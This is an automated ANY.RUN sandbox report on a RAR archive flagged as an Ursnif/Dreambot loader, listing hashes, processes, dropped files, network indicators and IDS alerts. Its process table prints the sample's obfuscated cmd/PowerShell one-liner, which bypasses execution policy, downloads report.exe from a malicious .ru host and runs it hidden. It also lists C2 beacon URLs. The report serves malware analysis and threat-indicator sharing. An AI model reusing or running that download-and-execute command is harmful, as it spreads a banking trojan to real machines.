analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

1.rar

Full analysis: https://app.any.run/tasks/566b2183-3d49-49d6-b062-d12229faf38a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 25, 2019, 10:30:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
gozi
ursnif
evasion
dreambot
Indicators:
MIME: application/x-rar
File info: RAR archive data, flags: EncryptedBlockHeader
MD5:

B7DB46FBA8C56E721AF37E643B6EE782

SHA1:

F7EC6AE41FFE0069A8EA1E051687B0EE323A9B7E

SHA256:

745C652A77178823A21B0983CE6E004629C9B067DFC7DD81D14F3919D4FC4E97

SSDEEP:

384:k4X7NiZx2kyf+5BRne02r+Th9fenxl94FEHhO/:hiZx2kySFlTe/94SHhO/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • TempSKg43.exe (PID: 1984)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3632)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2268)
    • Detected URSNIF Trojan

      • TempSKg43.exe (PID: 1984)
    • Runs injected code in another process

      • TempSKg43.exe (PID: 1984)
    • Application was injected by another process

      • explorer.exe (PID: 252)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 252)
    • Changes the autorun value in the registry

      • explorer.exe (PID: 252)
    • Connects to CnC server

      • explorer.exe (PID: 252)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2268)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2540)
      • explorer.exe (PID: 252)
    • Executes scripts

      • WinRAR.exe (PID: 2868)
    • Creates files in the user directory

      • powershell.exe (PID: 2268)
      • TempSKg43.exe (PID: 1984)
    • Checks for external IP

      • nslookup.exe (PID: 2212)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
9
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start inject winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe #URSNIF tempskg43.exe no specs #URSNIF explorer.exe cmd.exe no specs nslookup.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2868"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\1.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2540"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb2868.25504\2.js" C:\Windows\System32\WScript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3632"C:\Windows\System32\cmd.exe" /c LtmVTxhyZgAGjYU & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://news-medias.ru/report.exe','%temp%SKg43.exe'); & start %temp%SKg43.exe & eCAWmzyjnGvNIBaC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2268powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://news-medias.ru/report.exe','C:\Users\admin\AppData\Local\TempSKg43.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1984C:\Users\admin\AppData\Local\TempSKg43.exe C:\Users\admin\AppData\Local\TempSKg43.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
252C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3868cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\BF0E.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2212nslookup myip.opendns.com resolver1.opendns.com C:\Windows\system32\nslookup.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3080cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\BF0E.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
790
Read events
685
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2268powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\01Z5N0TFZI5EFWIXK8LK.temp
MD5:
SHA256:
1984TempSKg43.exeC:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exe
MD5:
SHA256:
3868cmd.exeC:\Users\admin\AppData\Local\Temp\BF0E.bi1
MD5:
SHA256:
3080cmd.exeC:\Users\admin\AppData\Local\Temp\BF0E.bi1
MD5:
SHA256:
252explorer.exeC:\Users\admin\AppData\Local\Temp\A11B.bin
MD5:
SHA256:
252explorer.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.jstext
MD5:70CA454C915FEF80E1CB1551DEBF1712
SHA256:B4E4CADAE75F0726BFA923467AB414F323D81A90404BD0A356CC7C4158536653
2268powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2868WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb2868.25504\2.jstext
MD5:0A940D03B77D951E2CCF07073C31EFF7
SHA256:BA1FD6DD130D91182F9D0EB9E0C542B0982B87B4213BED08D0CCBD7827074F5C
2268powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF132444.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
252explorer.exeC:\Users\admin\AppData\Local\Temp\B6C4.bincompressed
MD5:5D272CE5EEE9F6A38706946D600A497C
SHA256:06A4500605FF1351DB8421102E9DB69353DEEC401684CB8B22419BB6B3423125
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
252
explorer.exe
GET
217.12.199.168:80
http://adonis-medicine.at/images/wE_2FWk_/2FK_2FOf9wNMpRVKv_2F16_/2FvX1iG2je/PlG2iB4enrlPk_2F2/OBqJDP3y5l3C/M8wUEwiDMEI/7hk1w_2Fbx81vM/4FalFJ40banE23EleSK9I/LAPJKUrwmFYDpSsI/up6p_2BlntANAuf/AB5JkQOS3d_2FzoTb7/iq4whRNxa/IWmD1S_2BSGtnwQovB3S/g7K7StOCeyW/4BM_2Fna/w.gif
UA
malicious
252
explorer.exe
POST
217.12.199.168:80
http://adonis-medicine.at/images/bwNGYsy_2BTSa/WbOiK6_2/FPl0vr0PCJCyYwjVgaz_2FJ/ldflt_2BIC/9Arbl7jgVPEnCy_2F/DcM0D1yG1mDi/8Gg_2Fs6Vno/wmzooXu15DsGlR/D0pIQphEeuV3jeZOq_2F1/PqQR9KTys9GeQyFA/HBCOEnHl4t9sm98/4dC7vdMg0qPN5Kxw0a/wTvfEKC_2/BfRwlp4HFidjSb5qVuXL/QVfVd92kB/oT8hvsIFPRF4/wx.bmp
UA
malicious
2268
powershell.exe
GET
200
143.208.165.41:80
http://news-medias.ru/report.exe
DO
executable
544 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
217.12.199.168:80
news-medias.ru
ITL Company
UA
malicious
2212
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
2268
powershell.exe
143.208.165.41:80
news-medias.ru
Columbus Networks USA, Inc.
DO
malicious
252
explorer.exe
217.12.199.168:80
news-medias.ru
ITL Company
UA
malicious

DNS requests

Domain
IP
Reputation
news-medias.ru
  • 143.208.165.41
  • 95.140.195.178
  • 86.101.230.109
  • 91.104.18.219
  • 82.208.161.228
  • 87.126.16.141
  • 91.201.175.46
  • 62.73.70.146
  • 217.12.199.168
malicious
11totalzaelooop11.club
unknown
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
  • 185.117.118.92
shared
adonis-medicine.at
  • 217.12.199.168
  • 143.208.165.41
  • 95.140.195.178
  • 86.101.230.109
  • 91.104.18.219
  • 82.208.161.228
  • 87.126.16.141
  • 91.201.175.46
  • 62.73.70.146
malicious

Threats

PID
Process
Class
Message
2268
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2212
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2212
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
252
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Beacon
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
252
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Data Exfil
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
4 ETPRO signatures available at the full report
No debug info